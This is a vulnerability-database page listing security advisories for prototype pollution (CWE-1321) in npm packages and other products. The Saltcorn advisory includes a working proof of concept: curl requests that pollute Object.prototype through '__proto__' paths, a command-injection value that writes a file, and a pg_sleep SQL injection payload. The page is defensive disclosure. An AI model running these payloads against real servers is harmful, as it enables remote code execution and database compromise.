Common Weakness Enumeration

CWE-1321

Allowed

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Abstraction: Variant · Status: Incomplete

The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.

780 vulnerabilities reference this CWE, most recent first.

GHSA-78P3-FWCQ-62C2

Vulnerability from github – Published: 2024-10-03 19:50 – Updated: 2024-10-03 19:50
VLAI
Summary
@saltcorn/server Remote Code Execution (RCE) / SQL injection via prototype pollution by manipulating `lang` and `defstring` parameters when setting localizer strings
Details

Summary

The endpoint /site-structure/localizer/save-string/:lang/:defstring accepts two parameter values: lang and defstring. These values are used in an unsafe way to set the keys and value of the cfgStrings object. It allows to add/modify properties of the Object prototype that result in several logic issues, including: - RCE vulnerabilities by polluting the tempRootFolder property - SQL injection vulnerabilities by polluting the schema property when using PostgreSQL database.

Details

  • file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239
router.post(
  "/localizer/save-string/:lang/:defstring",
  isAdmin,
  error_catcher(async (req, res) => {
    const { lang, defstring } = req.params; // source

    const cfgStrings = getState().getConfigCopy("localizer_strings");
    if (cfgStrings[lang]) cfgStrings[lang][defstring] = text(req.body.value); // [1] sink
    else cfgStrings[lang] = { [defstring]: text(req.body.value) };
    await getState().setConfig("localizer_strings", cfgStrings);
    res.redirect(`/site-structure/localizer/edit/${lang}`);
  })
);

PoC

Setup: - set SALTCORN_NWORKERS=1 before starting the saltcorn server (to easily observe the behavior of the PoC)

SALTCORN_NWORKERS=1 saltcorn serve
  • make sure to use PostgresSQL backend
  • login with a user with admin permission

RCE

This PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain command executed. - check that the file that will be created does not exists:

cat /tmp/RCE
cat: /tmp/RCE: No such file or directory
  • pollute the Object.prototype with a tempRootFolder value set to ;echo+"rce"|tee+/tmp/RCE; by sending the following request *** :
curl -i -X $'POST' \
    -H $'Host: localhost:3000' \
    -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' \
    -H $'Origin: http://localhost:3000' \
    -H $'Connection: close' \
    -b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \
    --data-binary $'_csrf=VALID_csrf_Value&value=;echo+"rce"|tee+/tmp/RCE;' \
    $'http://localhost:3000/site-structure/localizer/save-string/__proto__/tempRootFolder'

visit http://localhost:3000/plugins/new - enter the following fields: - Name: test - Source: git - other fields blank - click Create - you will get an error but the command echo "rce" | tee /tmp/RCE will be executed - to verify:

cat /tmp/RCE
rce

The RCE occurs because after the previous curl request, the tempRootFolder property is set to ;echo+"rce"|tee+/tmp/RCE; that is later used to build the shell commands.

  • file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L45-L58
class PluginInstaller {
  constructor(plugin, opts = {}) { // opts will have the tempRootFolder property set with dangerous values // [2]
    [...]
    this.tempRootFolder =
      opts.tempRootFolder || envPaths("saltcorn", { suffix: "tmp" }).temp; // [3]
     [...]
    this.pckJsonPath = join(this.pluginDir, "package.json");
    this.tempDir = join(this.tempRootFolder, "temp_install", ...tokens); // [4]
    [...]
  }
  [...]
}

SQL Injection

This PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain SQL queries (i.e SQLi). - visit http://localhost:3000/table to check the page returns some results (no errors) - pollute the Object.prototype with a schema value set to " (just to create an exception in the query that will be executed to demonstrate the issue) by sending the following request *** :

curl -i -X $'POST' \
    -H $'Host: localhost:3000' \
    -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' \
    -H $'Origin: http://localhost:3000' \
    -H $'Connection: close' \
    -b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \
    --data-binary $'_csrf=VALID_csrf_Value&value=\"' \
    $'http://localhost:3000/site-structure/localizer/save-string/__proto__/schema'
  • visit again http://localhost:3000/table but this time an SQL error will appear:
syntax error at or near "" order by lower(""

NOTE: Another payload to use as value could be pg_user"+WHERE+1=1+AND+(SELECT+pg_sleep(5))+IS+NOT+NULL+--

The SQL injection occurs because after the previous curl request, the schema property is set to ". - file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/postgres/postgres.js#L101

const select = async (tbl, whereObj, selectopts = {}) => { // [2] selectopts
  const { where, values } = mkWhere(whereObj);
  const schema = selectopts.schema || getTenantSchema(); // [3] selectopts.schema
  const sql = `SELECT ${
    selectopts.fields ? selectopts.fields.join(", ") : `*`
  } FROM "${schema}"."${sqlsanitize(tbl)}" ${where} ${mkSelectOptions( // [4] schema
    selectopts,
    values,
    false
  )}`;
  sql_log(sql, values);
  const tq = await (client || selectopts.client || pool).query(sql, values);

  return tq.rows;
};

*** Retrieve valid values for the connect.sid (VALID_CONNECT_SID_COOKIE) and _csrf values (VALID_csrf_Value) : - open the browser developer console and go to the Network tab - visit http://localhost:3000/site-structure/localizer/add-lang - add a language (Name: test , Locale: test) and click Save - under the Network tab, filter for save-lang and check the request parameters (Headers and Payload/Request tabs) - copy the values for connect.sid and _csrf and paste in the curl command above

Impact

Remote code execution (RCE), Sql injection and business logic errors.

Recommended Mitigation

Check the values of lang and defstring parameters against dangerous properties like __proto__, constructor, prototype.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.0-beta.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@saltcorn/server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.0-beta.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-10-03T19:50:59Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe endpoint `/site-structure/localizer/save-string/:lang/:defstring` accepts two parameter values: `lang` and `defstring`. These values are used in an unsafe way to set the keys and value of the `cfgStrings` object. It allows to add/modify properties of the `Object prototype` that result in several logic issues, including:\n- RCE vulnerabilities by polluting the `tempRootFolder` property \n- SQL injection vulnerabilities by polluting the `schema` property when using `PostgreSQL` database.\n\n\n### Details\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239\n```js\nrouter.post(\n  \"/localizer/save-string/:lang/:defstring\",\n  isAdmin,\n  error_catcher(async (req, res) =\u003e {\n    const { lang, defstring } = req.params; // source\n\n    const cfgStrings = getState().getConfigCopy(\"localizer_strings\");\n    if (cfgStrings[lang]) cfgStrings[lang][defstring] = text(req.body.value); // [1] sink\n    else cfgStrings[lang] = { [defstring]: text(req.body.value) };\n    await getState().setConfig(\"localizer_strings\", cfgStrings);\n    res.redirect(`/site-structure/localizer/edit/${lang}`);\n  })\n);\n```\n\n### PoC\n\nSetup:\n- set `SALTCORN_NWORKERS=1` before starting the `saltcorn` server (to easily observe the behavior of the PoC)\n```\nSALTCORN_NWORKERS=1 saltcorn serve\n```\n- make sure to use PostgresSQL backend\n- login with a user with admin permission\n\n#### RCE\n\nThis PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain command executed.\n- check that the file that will be created does not exists:\n```\ncat /tmp/RCE\ncat: /tmp/RCE: No such file or directory\n```\n\n- pollute the `Object.prototype` with a `tempRootFolder` value set to `;echo+\"rce\"|tee+/tmp/RCE;` by sending the following request *** :\n\n```bash\ncurl -i -X $\u0027POST\u0027 \\\n    -H $\u0027Host: localhost:3000\u0027 \\\n    -H $\u0027Content-Type: application/x-www-form-urlencoded; charset=UTF-8\u0027 -H $\u0027Accept: */*\u0027 \\\n    -H $\u0027Origin: http://localhost:3000\u0027 \\\n    -H $\u0027Connection: close\u0027 \\\n    -b $\u0027loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE\u0027 \\\n    --data-binary $\u0027_csrf=VALID_csrf_Value\u0026value=;echo+\"rce\"|tee+/tmp/RCE;\u0027 \\\n    $\u0027http://localhost:3000/site-structure/localizer/save-string/__proto__/tempRootFolder\u0027\n```\n\n visit `http://localhost:3000/plugins/new`\n- enter the following fields:\n\t- Name: `test`\n\t- Source: `git`\n\t- other fields blank\n  - click `Create`\n- you will get an error but the command `echo \"rce\" | tee /tmp/RCE` will be executed\n- to verify:\n```\ncat /tmp/RCE\nrce\n```\n\nThe RCE occurs because after the previous curl request, the `tempRootFolder` property is set to `;echo+\"rce\"|tee+/tmp/RCE;` that is later used to build the shell commands.\n\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L45-L58\n\n```js\nclass PluginInstaller {\n  constructor(plugin, opts = {}) { // opts will have the tempRootFolder property set with dangerous values // [2]\n    [...]\n    this.tempRootFolder =\n      opts.tempRootFolder || envPaths(\"saltcorn\", { suffix: \"tmp\" }).temp; // [3]\n\t [...]\n    this.pckJsonPath = join(this.pluginDir, \"package.json\");\n    this.tempDir = join(this.tempRootFolder, \"temp_install\", ...tokens); // [4]\n    [...]\n  }\n  [...]\n}\n```\n\n#### SQL Injection\n\nThis PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain SQL queries (i.e SQLi).\n- visit `http://localhost:3000/table` to check the page returns some results (no errors)\n- pollute the `Object.prototype` with a schema value set to `\"` (just to create an exception in the query that will be executed to demonstrate the issue) by sending the following request *** :\n\n```\ncurl -i -X $\u0027POST\u0027 \\\n    -H $\u0027Host: localhost:3000\u0027 \\\n    -H $\u0027Content-Type: application/x-www-form-urlencoded; charset=UTF-8\u0027 -H $\u0027Accept: */*\u0027 \\\n    -H $\u0027Origin: http://localhost:3000\u0027 \\\n    -H $\u0027Connection: close\u0027 \\\n    -b $\u0027loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE\u0027 \\\n    --data-binary $\u0027_csrf=VALID_csrf_Value\u0026value=\\\"\u0027 \\\n    $\u0027http://localhost:3000/site-structure/localizer/save-string/__proto__/schema\u0027\n```\n\n- visit again `http://localhost:3000/table` but this time an SQL error will appear:\n```\nsyntax error at or near \"\" order by lower(\"\"\n```\n\n\n**NOTE**: Another payload to use as `value` could be `pg_user\"+WHERE+1=1+AND+(SELECT+pg_sleep(5))+IS+NOT+NULL+--`\n\nThe SQL injection occurs because after the previous curl request, the `schema` property is set to `\"`.\n- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/postgres/postgres.js#L101\n\n```js\nconst select = async (tbl, whereObj, selectopts = {}) =\u003e { // [2] selectopts\n  const { where, values } = mkWhere(whereObj);\n  const schema = selectopts.schema || getTenantSchema(); // [3] selectopts.schema\n  const sql = `SELECT ${\n    selectopts.fields ? selectopts.fields.join(\", \") : `*`\n  } FROM \"${schema}\".\"${sqlsanitize(tbl)}\" ${where} ${mkSelectOptions( // [4] schema\n    selectopts,\n    values,\n    false\n  )}`;\n  sql_log(sql, values);\n  const tq = await (client || selectopts.client || pool).query(sql, values);\n\n  return tq.rows;\n};\n```\n\n*** Retrieve valid values for the `connect.sid` (`VALID_CONNECT_SID_COOKIE`) and `_csrf` values (`VALID_csrf_Value`) :\n- open the browser developer console and go to the `Network` tab\n- visit `http://localhost:3000/site-structure/localizer/add-lang`\n- add a language (`Name: test` , `Locale: test`) and click `Save`\n- under the `Network` tab, filter for `save-lang` and check the request parameters (`Headers` and `Payload`/`Request` tabs)\n- copy the values for `connect.sid` and `_csrf` and paste in the curl command above\n\n### Impact\n\nRemote code execution (RCE), Sql injection and business logic errors.\n\n### Recommended Mitigation\n\nCheck the values of `lang` and  `defstring` parameters against dangerous properties like `__proto__`, `constructor`, `prototype`.",
  "id": "GHSA-78p3-fwcq-62c2",
  "modified": "2024-10-03T19:50:59Z",
  "published": "2024-10-03T19:50:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/saltcorn/saltcorn/security/advisories/GHSA-78p3-fwcq-62c2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/saltcorn/saltcorn/commit/9e066ae8ba317469053cc27e95dcdf5b6e60e12d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/saltcorn/saltcorn"
    },
    {
      "type": "WEB",
      "url": "https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@saltcorn/server Remote Code Execution (RCE) / SQL injection via prototype pollution  by manipulating `lang` and  `defstring` parameters when setting localizer strings"
}

GHSA-798J-M949-2J7C

Vulnerability from github – Published: 2025-03-28 21:30 – Updated: 2025-04-01 21:30
VLAI
Details

A Prototype Pollution issue in Aliconnect /sdk v.0.0.6 allows an attacker to execute arbitrary code via the aim function in the aim.js component.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-24292"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-28T21:15:15Z",
    "severity": "CRITICAL"
  },
  "details": "A Prototype Pollution issue in Aliconnect /sdk v.0.0.6 allows an attacker to execute arbitrary code via the aim function in the aim.js component.",
  "id": "GHSA-798j-m949-2j7c",
  "modified": "2025-04-01T21:30:46Z",
  "published": "2025-03-28T21:30:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24292"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/tariqhawis/a8b2c936622c885558173c37df0a77d9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-799Q-F2PX-WX8C

Vulnerability from github – Published: 2025-03-28 21:30 – Updated: 2025-04-01 14:32
VLAI
Summary
Duplicate Advisory: @alizeait/unflatto Prototype Pollution via `exports.unflatto` Method
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-q8jq-4rm5-4hm5. This link is maintained to preserve external references.

Original Description

alizeait unflatto <= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/index.js. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@alizeait/unflatto"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-31T15:57:15Z",
    "nvd_published_at": "2025-03-28T21:15:16Z",
    "severity": "HIGH"
  },
  "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-q8jq-4rm5-4hm5. This link is maintained to preserve external references.\n\n## Original Description\nalizeait unflatto \u003c= 1.0.2 was discovered to contain a prototype pollution via the method exports.unflatto at /dist/index.js. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.",
  "id": "GHSA-799q-f2px-wx8c",
  "modified": "2025-04-01T14:32:14Z",
  "published": "2025-03-28T21:30:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38988"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alizeait/unflatto/issues/32"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/mestrtee/4c5dfb66bea377889c44dd6c8af28713"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/alizeait/unflatto"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: @alizeait/unflatto Prototype Pollution via `exports.unflatto` Method",
  "withdrawn": "2025-04-01T14:32:14Z"
}

GHSA-79H2-V6HH-WQ23

Vulnerability from github – Published: 2025-02-06 06:31 – Updated: 2025-02-06 22:52
VLAI
Summary
@ndhoule/defaults prototype pollution
Details

A prototype pollution in the lib.deep function of @ndhoule/defaults v2.0.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@ndhoule/defaults"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-57066"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-06T22:52:18Z",
    "nvd_published_at": "2025-02-05T22:15:31Z",
    "severity": "HIGH"
  },
  "details": "A prototype pollution in the lib.deep function of @ndhoule/defaults v2.0.1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted payload.",
  "id": "GHSA-79h2-v6hh-wq23",
  "modified": "2025-02-06T22:52:18Z",
  "published": "2025-02-06T06:31:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57066"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/tariqhawis/8ee7327cc8b78df738cd32505cbbbd44"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ndhoule/defaults"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@ndhoule/defaults prototype pollution"
}

GHSA-79XF-67R4-Q2JJ

Vulnerability from github – Published: 2023-04-11 06:30 – Updated: 2023-04-19 17:10
VLAI
Summary
safe-eval vulnerable to Sandbox Bypass due to improper input sanitization
Details

All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution (RCE).

Vulnerable functions:

defineGetter, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "safe-eval"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26122"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-04-11T15:27:27Z",
    "nvd_published_at": "2023-04-11T05:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution (RCE).\n\n**Vulnerable functions:**\n\n__defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(),  valueOf().",
  "id": "GHSA-79xf-67r4-q2jj",
  "modified": "2023-04-19T17:10:20Z",
  "published": "2023-04-11T06:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26122"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hacksparrow/safe-eval/issues/27"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hacksparrow/safe-eval/issues/31"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hacksparrow/safe-eval/issues/32"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hacksparrow/safe-eval/issues/33"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hacksparrow/safe-eval/issues/34"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hacksparrow/safe-eval/issues/35"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/seongil-wi/2db6cb884e10137a93132b7f74879cce"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hacksparrow/safe-eval"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-SAFEEVAL-3373064"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "safe-eval vulnerable to Sandbox Bypass due to improper input sanitization"
}

GHSA-7FGX-PMW9-49H5

Vulnerability from github – Published: 2024-08-13 12:30 – Updated: 2024-08-13 12:30
VLAI
Details

A flaw allowing arbitrary code execution was discovered in Kibana. An attacker with access to ML and Alerting connector features, as well as write access to internal ML indices can trigger a prototype pollution vulnerability, ultimately leading to arbitrary code execution.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-37287"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321",
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-13T12:15:06Z",
    "severity": "CRITICAL"
  },
  "details": "A flaw allowing arbitrary code execution was discovered in Kibana. An attacker with access to ML and Alerting connector features, as well as write access to internal ML indices can trigger a prototype pollution vulnerability, ultimately leading to arbitrary code execution.",
  "id": "GHSA-7fgx-pmw9-49h5",
  "modified": "2024-08-13T12:30:53Z",
  "published": "2024-08-13T12:30:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37287"
    },
    {
      "type": "WEB",
      "url": "https://discuss.elastic.co/t/kibana-8-14-2-7-17-23-security-update-esa-2024-22"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7H43-GX24-P529

Vulnerability from github – Published: 2021-05-10 19:17 – Updated: 2021-04-19 22:36
VLAI
Summary
Prototype pollution in json8
Details

This affects the package json8 before 1.0.3. The function adds in the target object the property specified in the path, however it does not properly check the key being set, leading to a prototype pollution.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "json8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7770"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-19T22:36:51Z",
    "nvd_published_at": "2020-11-12T11:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "This affects the package json8 before 1.0.3. The function adds in the target object the property specified in the path, however it does not properly check the key being set, leading to a prototype pollution.",
  "id": "GHSA-7h43-gx24-p529",
  "modified": "2021-04-19T22:36:51Z",
  "published": "2021-05-10T19:17:05Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7770"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sonnyp/JSON8/commit/2e890261b66cbc54ae01d0c79c71b0fd18379e7e"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-JSON8-1017116"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/json8"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype pollution in json8"
}

GHSA-7MG4-W3W5-X5PC

Vulnerability from github – Published: 2021-05-10 18:37 – Updated: 2025-03-05 19:04
VLAI
Summary
Prototype pollution in json-pointer
Details

This affects the package json-pointer before 0.6.1. Multiple reference of object using slash is supported.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "json-pointer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.webjars.npm:json-pointer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-7709"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-21T21:10:19Z",
    "nvd_published_at": "2020-10-05T08:15:00Z",
    "severity": "MODERATE"
  },
  "details": "This affects the package json-pointer before 0.6.1. Multiple reference of object using slash is supported.",
  "id": "GHSA-7mg4-w3w5-x5pc",
  "modified": "2025-03-05T19:04:37Z",
  "published": "2021-05-10T18:37:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7709"
    },
    {
      "type": "WEB",
      "url": "https://github.com/manuelstofer/json-pointer/pull/34"
    },
    {
      "type": "WEB",
      "url": "https://github.com/manuelstofer/json-pointer/pull/34/files"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/manuelstofer/json-pointer"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-598862"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-JSONPOINTER-596925"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/json-pointer"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype pollution in json-pointer"
}

GHSA-7PPQ-3WW2-75F4

Vulnerability from github – Published: 2024-07-24 21:31 – Updated: 2024-07-24 21:31
VLAI
Details

A vulnerability in the web-based management interface of HPE Aruba Networking EdgeConnect SD-WAN gateway could allow an authenticated remote attacker to conduct a server-side prototype pollution attack. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the underlying operating system leading to complete system compromise.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-33519"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-24T20:15:03Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in the web-based management interface of HPE Aruba Networking EdgeConnect SD-WAN gateway could allow an authenticated remote attacker to conduct a server-side prototype pollution attack. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the underlying operating system leading to complete system compromise.",
  "id": "GHSA-7ppq-3ww2-75f4",
  "modified": "2024-07-24T21:31:30Z",
  "published": "2024-07-24T21:31:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-33519"
    },
    {
      "type": "WEB",
      "url": "https://csaf.arubanetworks.com/2024/hpe_aruba_networking_-_hpesbnw04673.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7PRF-VW4P-QR59

Vulnerability from github – Published: 2021-12-10 19:03 – Updated: 2021-06-22 15:45
VLAI
Summary
Prototype pollution in supermixer
Details

Prototype pollution in Stampit supermixer allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "supermixer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-24939"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-06-17T18:46:22Z",
    "nvd_published_at": "2021-06-16T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "Prototype pollution in Stampit supermixer allows an attacker to modify the prototype of a base object which can vary in severity depending on the implementation.",
  "id": "GHSA-7prf-vw4p-qr59",
  "modified": "2021-06-22T15:45:35Z",
  "published": "2021-12-10T19:03:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24939"
    },
    {
      "type": "WEB",
      "url": "https://github.com/stampit-org/supermixer/issues/9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/stampit-org/supermixer/commit/94dcc6fc45e0fed96187cb52aaffadf76dbbc0a3"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/959987"
    },
    {
      "type": "WEB",
      "url": "https://github.com/stampit-org/supermixer/compare/v1.0.4...v1.0.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Prototype pollution in supermixer"
}

Mitigation
Implementation

